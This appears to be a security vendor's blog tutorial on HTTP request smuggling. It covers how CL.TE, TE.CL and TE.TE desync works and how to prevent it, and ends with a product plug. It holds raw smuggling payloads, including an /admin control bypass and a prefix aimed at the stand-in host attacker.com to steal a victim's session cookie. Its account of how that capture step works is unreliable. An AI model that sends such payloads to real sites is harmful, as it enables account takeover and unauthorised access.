cybersecurity

What is HTTP Request Smuggling? Ways to Exploit, Examples and Impact

Master HTTP Request Smuggling: Learn CL.TE and TE.CL techniques, real-world exploitation scenarios, and mitigation strategies to secure your web applications.

Mahesh

5 min read
What is HTTP Request Smuggling? Ways to Exploit, Examples and Impact

Modern web applications are rarely simple, single-server entities. Instead, they rely on a complex chain of systems, including load balancers, reverse proxies, and web application firewalls (WAFs), all sitting in front of the actual back-end application server. While this architecture improves performance and scalability, it introduces a critical security risk known as HTTP Request Smuggling. This vulnerability arises when the front-end and back-end servers disagree on where one HTTP request ends and the next one begins.

In this guide, we will dive deep into the mechanics of HTTP Request Smuggling (HRS), explore the primary exploitation techniques like CL.TE and TE.CL, walk through technical examples, and discuss how you can protect your infrastructure using tools like Jsmon.

Understanding the Basics: How HTTP Requests are Delimited

To understand smuggling, we first need to understand how web servers know how much data to read from a network socket. In HTTP/1.1, there are two primary ways to specify the length of a request body:

  1. Content-Length (CL): This header specifies the size of the request body in bytes. For example, Content-Length: 11 means the server should expect exactly 11 bytes of data following the headers.
  2. Transfer-Encoding (TE): When set to chunked, the request body is sent in a series of chunks. Each chunk starts with its size in hexadecimal, followed by the data. The message is terminated by a chunk of size zero (0).

HTTP Request Smuggling occurs because the HTTP/1.1 specification allows both headers to be present in a single request. If the front-end proxy and the back-end server choose to prioritize different headers, an attacker can craft a "malformed" request that is interpreted as one request by the front-end but as two separate requests by the back-end. The second "smuggled" request effectively gets prepended to the next legitimate user's request.

The Three Primary Types of HTTP Request Smuggling

Most HRS vulnerabilities fall into one of three categories based on which server honors which header.

1. CL.TE: Front-end uses Content-Length, Back-end uses Transfer-Encoding

In a CL.TE vulnerability, the front-end server looks at the Content-Length header to determine the request size, while the back-end server looks at the Transfer-Encoding header.

Consider the following malicious request:

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

What happens?

  • The front-end sees Content-Length: 13. It counts 13 bytes (from the start of 0 to the end of SMUGGLED) and forwards the whole thing to the back-end.
  • The back-end sees Transfer-Encoding: chunked. It processes the 0 as the end of the first request.
  • The remaining part, SMUGGLED, is left in the back-end server's buffer.
  • When the next legitimate request arrives, the back-end treats SMUGGLED as the start of that new request, leading to unpredictable and often dangerous behavior.

2. TE.CL: Front-end uses Transfer-Encoding, Back-end uses Content-Length

This is the inverse of the previous scenario. Here, the front-end honors the chunked encoding, but the back-end relies on the content length.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

What happens?

  • The front-end processes the chunked body. It sees a chunk of 8 bytes (SMUGGLED), then a zero-length chunk, and forwards everything to the back-end.
  • The back-end sees Content-Length: 3. It only reads the first 3 bytes (the 8\r\n).
  • The rest of the data (SMUGGLED\r\n0\r\n) remains in the buffer, waiting to be prepended to the next request.

3. TE.TE: Both servers use Transfer-Encoding

In this case, both servers support chunked encoding, but an attacker can obfuscate the Transfer-Encoding header so that one of the servers fails to process it and falls back to using Content-Length instead. Examples of obfuscation include:

Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: [tab]chunked

By finding a variation that the front-end ignores but the back-end accepts (or vice versa), the attacker effectively turns the situation into a CL.TE or TE.CL vulnerability.

How to Exploit HTTP Request Smuggling

Now that we understand the mechanics, let's look at how attackers actually exploit these discrepancies to cause harm.

Bypassing Front-end Security Controls

Many organizations use front-end proxies to enforce security rules, such as blocking access to /admin panels. If an attacker can smuggle a request, they can bypass these checks because the front-end only sees a request to a "safe" URL (like /), while the back-end sees the smuggled request to /admin.

Payload Example:

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Foo: x

The front-end forwards the whole block. The back-end processes the POST / and then sees GET /admin as a separate request. Since the back-end often trusts the front-end, it might skip authentication checks for the smuggled admin request.

Revealing Front-end Request Rewriting

In many environments, the front-end proxy adds custom headers to requests before forwarding them to the back-end. These headers might contain sensitive data like the user's IP address (X-Forwarded-For) or their internal ID. An attacker can use smuggling to "capture" these headers.

By smuggling a request that starts a POST body, the attacker can force the front-end to append its internal headers directly into the body of the attacker's smuggled request. If the smuggled request points to a feature like a comment section or a profile update, the attacker can then read the headers in the saved output.

Capturing Other Users' Requests (Session Hijacking)

This is perhaps the most critical impact. By smuggling a partial request, an attacker can prepend their data to the next user's request. If the attacker's smuggled part looks like this:

GET /capture HTTP/1.1
Host: attacker.com
Ignore:

When a victim sends a request (including their session cookies), it will be appended to the attacker's Ignore: header. The entire victim's request is then sent to the attacker's server as the value of that header, allowing the attacker to steal the victim's session cookie.

Real-World Impact of HTTP Request Smuggling

The impact of HRS is often catastrophic because it undermines the fundamental trust between different layers of the web stack. Key impacts include:

  • Account Takeover: Stealing session cookies or CSRF tokens from other users.
  • Data Leakage: Accessing internal APIs or administrative interfaces.
  • Web Cache Poisoning: Forcing the front-end cache to store a malicious response for a legitimate URL, affecting all users of the site.
  • Bypassing WAFs: Since the WAF only inspects the "outer" request, the smuggled "inner" request goes uninspected.

How to Detect and Prevent Request Smuggling

Detecting HRS manually is difficult because it involves timing-based analysis. Security researchers often send requests that would cause a back-end timeout if smuggling is successful. For example, in a CL.TE test, sending a Content-Length that is longer than the actual body might cause the back-end to wait for data that never arrives.

Prevention Strategies

  1. Use HTTP/2 End-to-End: HTTP/2 uses a binary framing mechanism that eliminates the ambiguity of where requests end. If you use HTTP/2 between the front-end and back-end, smuggling is virtually impossible.
  2. Disable Header Reuse: Configure your front-end proxy to not reuse TCP connections to the back-end, although this can significantly impact performance.
  3. Strict Parsing: Ensure that both your front-end and back-end use the exact same HTTP parsing library or are configured to handle duplicate or conflicting headers in identical ways (e.g., rejecting any request with both Content-Length and Transfer-Encoding).
  4. Prioritize TE over CL: According to the HTTP specification, if both headers are present, Transfer-Encoding should take precedence. Ensure all servers in your chain follow this rule strictly.

Conclusion

HTTP Request Smuggling is a sophisticated and dangerous vulnerability that highlights the complexities of modern web architecture. By exploiting the subtle differences in how servers interpret HTTP headers, attackers can bypass security perimeters, hijack user sessions, and gain unauthorized access to internal systems. As organizations continue to scale their infrastructure, understanding and mitigating these protocol-level discrepancies is essential for maintaining a robust security posture.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.

Read more